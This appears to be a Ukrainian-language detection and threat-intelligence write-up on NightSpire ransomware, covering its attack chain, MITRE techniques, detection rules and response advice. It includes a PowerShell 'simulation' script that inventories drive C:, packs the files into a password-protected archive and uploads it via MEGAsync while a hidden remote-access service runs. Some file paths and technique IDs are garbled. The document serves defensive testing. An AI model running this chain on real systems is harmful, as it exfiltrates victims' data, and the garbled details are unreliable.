Атака з використанням програми-вимагача NightSpire: ланцюг, інструменти та тактика
Стежити 
Detection stack
- AIDR
- Alert
- ETL
- Query
Резюме
NightSpire — це родина рансомвару на базі Go, вперше виявлена на початку 2025 року, яка використовує модель подвійного здирництва, крадучи дані перед шифруванням і загрожуючи опублікувати їх на Tor-базованому сайті витоків. Рансомвар додає .nspire розширення до зашифрованих файлів і розміщує примітки з викупом у кожному ураженому каталозі, включаючи папки, пов’язані з OneDrive. Її оператори покладаються на легітимні інструменти віддаленого адміністрування, щоб підтримувати доступ і використовувати загальнодоступні утиліти для виявлення, архівації та ексфільтрації. Між березнем і червнем 2025 року кампанія вплинула на щонайменше 64 організації у 33 країнах.
Розслідування
Розслідування показало, що зловмисники, як правило, отримували початковий доступ через відкритий RDP, а потім встановлювали Chrome Remote Desktop та AnyDesk як постійні служби. Вони використовували Everything для швидкого пошуку файлів, 7-Zip для створення архівів, захищених паролем, і MEGAsync для завантаження вкрадених даних на хмарне сховище MEGA. Шифрувальник на базі Go працював під conhost.exe, перераховував всі доступні диски і шифрував файли, залишаючи імена файлів OneDrive без змін. Етап здирництва спирався на сайт витоків, організований на Tor, який використовувався для тиску на жертв після ексфільтрації.
Захист
Організації повинні зменшити або усунути прямий доступ RDP, контролювати несподівану установку легітимних інструментів віддаленого адміністрування як служб, а також застосовувати дозволене списання додатків до двійкових файлів, таких як Chrome Remote Desktop та AnyDesk. Правила поведінкового виявлення повинні зосереджуватись на масовій інвентаризації файлів, створенні архівів і незвичайних завантаженнях на хмарні сховища. Регулярні резервні копії і випробувані процедури відновлення залишаються важливими, а мережеві контролі повинні блокувати відомі кінцеві точки завантаження MEGA. Захист також може бути перевірений через контрольовані симуляції рансомвару, такі як ті, що пропонує Picus.
Відповідь
Якщо виявлено активність NightSpire, негайно ізолюйте постраждалий кінцевий пункт, зупиніть процес шифрувальника і зберіть волатильну пам’ять для аналізу. Вимкніть будь-які шкідливі служби, видаліть залишені інструменти віддаленого доступу і заблокуйте відповідні мережеві комунікації. Відновлення повинно виконуватися з надійних резервних копій, а зацікавлені сторони повинні бути повідомлені. Інцидент також слід повідомити правоохоронним органам, поки захисники продовжують контролювати асоційований сайт витоків на Tor на наявність ознак опублікованих даних.
graph TB %% Визначення класів classDef action fill:#99ccff classDef tool fill:#cccccc classDef malware fill:#ff6666 classDef process fill:#ffcc99 %% Вузли action_initial_access[“<b>Дія</b> – Початковий доступ<br/><b>Техніка</b> – T1136 Створення облікового запису<br/><b>Опис</b>: Зловмисник отримав доступ до мережі через Remote Desktop Protocol (RDP), сформувавши початкову точку входу.”] class action_initial_access action tool_rdp[“<b>Інструмент</b> – Remote Desktop Protocol (RDP)<br/><b>Опис</b>: Протокол, що дозволяє віддалений вхід до Windows-систем.”] class tool_rdp tool action_persistence[“<b>Дія</b> – Закріплення (Persistence)<br/><b>Техніка</b> – T1547.009 Модифікація ярликів<br/><b>Опис</b>: Встановлення AnyDesk і Chrome Remote Desktop як сервісів та додавання ярликів у папку автозавантаження.”] class action_persistence action tool_anydesk[“<b>Інструмент</b> – AnyDesk<br/><b>Функція</b>: Програмне забезпечення віддаленого доступу, встановлене як Windows-сервіс (anydesk.lnk).”] class tool_anydesk tool tool_chrome_rd[“<b>Інструмент</b> – Chrome Remote Desktop<br/><b>Функція</b>: Інструмент віддаленого доступу, що працює через сервіс remoting_host.exe.”] class tool_chrome_rd tool action_collection[“<b>Дія</b> – Збір даних<br/><b>Техніка</b> – T1560.001 Архівація зібраних даних<br/><b>Опис</b>: Використання 7-Zip для створення захищених паролем архівів після переліку файлів через Everything.”] class action_collection action tool_7zip[“<b>Інструмент</b> – 7-Zip<br/><b>Функція</b>: Стиснення даних у захищені архіви.”] class tool_7zip tool tool_everything[“<b>Інструмент</b> – Everything<br/><b>Функція</b>: Швидкий інструмент пошуку файлів для їхнього переліку.”] class tool_everything tool action_exfiltration[“<b>Дія</b> – Ексфільтрація<br/><b>Техніки</b> – T1537 Передача даних до хмарного акаунта<br/>T1567.002 Ексфільтрація через вебсервіси<br/><b>Опис</b>: Завантаження архівів у хмарне сховище MEGA через MEGAsync.”] class action_exfiltration action tool_megasync[“<b>Інструмент</b> – MEGAsync<br/><b>Функція</b>: Синхронізація локальних файлів із хмарою MEGA для ексфільтрації.”] class tool_megasync tool action_impact[“<b>Дія</b> – Вплив<br/><b>Техніка</b> – T1486 Шифрування даних для впливу<br/><b>Опис</b>: Go-шифрувальник запущено через conhost.exe, який шифрує файли, додає розширення .nspire та створює вимоги викупу.”] class action_impact action malware_encryptor[“<b>Шкідливе ПЗ</b> – Go ransomware<br/><b>Функція</b>: Шифрує файли, змінює розширення, створює записки з вимогою викупу.”] class malware_encryptor malware process_conhost[“<b>Процес</b> – conhost.exe<br/><b>Роль</b>: Запускає виконання Go ransomware payload.”] class process_conhost process %% Зв’язки action_initial_access –>|використовує| tool_rdp action_initial_access –>|переходить до| action_persistence action_persistence –>|встановлює| tool_anydesk action_persistence –>|встановлює| tool_chrome_rd action_persistence –>|переходить до| action_collection action_collection –>|використовує| tool_7zip action_collection –>|перелічує через| tool_everything action_collection –>|переходить до| action_exfiltration action_exfiltration –>|використовує| tool_megasync action_exfiltration –>|переходить до| action_impact action_impact –>|виконує| process_conhost process_conhost –>|запускає| malware_encryptor
Потік атаки
Виявлення
Можливий збір даних [7zip] (через командний рядок)
Переглянути
Альтернативне програмне забезпечення для віддаленого доступу/управління (через створення процесу)
Переглянути
Можлива прихована інсталяція Chrome Remote Desktop (через командний рядок)
Переглянути
Альтернативне програмне забезпечення для віддаленого доступу/управління (через систему)
Переглянути
Альтернативне програмне забезпечення для віддаленого доступу/управління (через аудит)
Переглянути
Виявлення інструментів постійності та ексфільтрації рандомвару NightSpire [Створення процесу Windows]
Переглянути
Виконання симуляції
Передумова: Тестування телеметрії та базова перевірка має пройдено успішно.
Обґрунтування: Цей розділ детально описує точне виконання техніки противника (TTP), призначеної для запуску правила виявлення. Команди та наратив ПОВИННІ безпосередньо відображати ідентифіковані TTP і прагнути до створення саме тієї телеметрії, яка очікується у логіці виявлення. Абстрактні або не пов’язані приклади призведуть до помилкового діагнозу.
-
Наратив атаки та команди:
- Налаштування стійкості (T1547 / T1219): Встановити Chrome Remote Desktop (за замовчуванням) та запустити його службу для отримання постійного віддаленого доступу.
- Виявлення (T1083): Використати Everything.exe для інвентаризації всіх файлів на диску C:, зберігаючи результати у тимчасовому списку.
- Архівація (T1037 / T1083): Запустити 7‑Zip для стиснення виявлених файлів у захищений паролем архів.
- Ексфільтрація (T1219.003): Запустити MEGAsync для завантаження архіву на обліковий запис MEGA.
Ця послідовність забезпечує, що selection_remote_access (Chrome Remote Desktop) активний, доки хоча б одне з selection_discovery, selection_archive, або selection_exfiltration відбувається, задовольняючи умову правила.
-
Скрипт регресійного тесту:
# ------------------------------------------------------------------------- # Симуляція бічної стійкості та ексфільтрації NightSpire # ------------------------------------------------------------------------- # Передумови: # - Chrome Remote Desktop встановлений за замовчуванням # - Everything.exe встановлений за замовчуванням # - 7z.exe встановлений за замовчуванням # - MEGAsync встановлений у стандартному профілі користувача # ------------------------------------------------------------------------- # 1. Переконайтеся, що служба Chrome Remote Desktop працює (симулює стійкість) $crdPath = "$Env:ProgramFiles(x86)GoogleChrome Remote Desktop147.0.7727.3remoting_host.exe" if (Test-Path $crdPath) { Start-Process -FilePath $crdPath -ArgumentList "--start-service" -WindowStyle Hidden Write-Host "Служба Chrome Remote Desktop запущена." } else { Write-Error "Chrome Remote Desktop не знайдено за шляхом $crdPath" exit 1 } # 2. Виявлення файлів за допомогою Everything $everythingPath = "$Env:ProgramFilesEverythingEverything.exe" $discoveryOutput = "$env:TEMPfilelist.txt" if (Test-Path $everythingPath) { & $everythingPath -search "C:" -output $discoveryOutput Write-Host "Виявлення завершено, результати збережено в $discoveryOutput" } else { Write-Error "Everything.exe не знайдено за шляхом $everythingPath" exit 1 } # 3. Архівування виявлених файлів з 7‑Zip $sevenZipPath = "$Env:ProgramFiles7-Zip7z.exe" $archivePath = "$env:TEMPexfil_archive.zip" if (Test-Path $sevenZipPath) { & $sevenZipPath a -tzip $archivePath "@$discoveryOutput" -p"StrongP@ssw0rd!" Write-Host "Архів створено в $archivePath" } else { Write-Error "7z.exe не знайдено за шляхом $sevenZipPath" exit 1 } # 4. Завантаження архіву через MEGAsync (ексфільтрація) $megaPath = "$Env:LOCALAPPDATAMEGAsyncMEGAsync.exe" if (Test-Path $megaPath) { & $megaPath --upload $archivePath Write-Host "Завантаження розпочато через MEGAsync." } else { Write-Error "MEGAsync.exe не знайдено за шляхом $megaPath" exit 1 } # Кінець симуляції -
Команди для очищення:
# Зупинити службу Chrome Remote Desktop Stop-Process -Name "remoting_host" -Force -ErrorAction SilentlyContinue # Видалити тимчасові файли Remove-Item -Path "$env:TEMPfilelist.txt" -Force -ErrorAction SilentlyContinue Remove-Item -Path "$env:TEMPexfil_archive.zip" -Force -ErrorAction SilentlyContinue # За бажанням зупинити MEGAsync, якщо працює Stop-Process -Name "MEGAsync" -Force -ErrorAction SilentlyContinue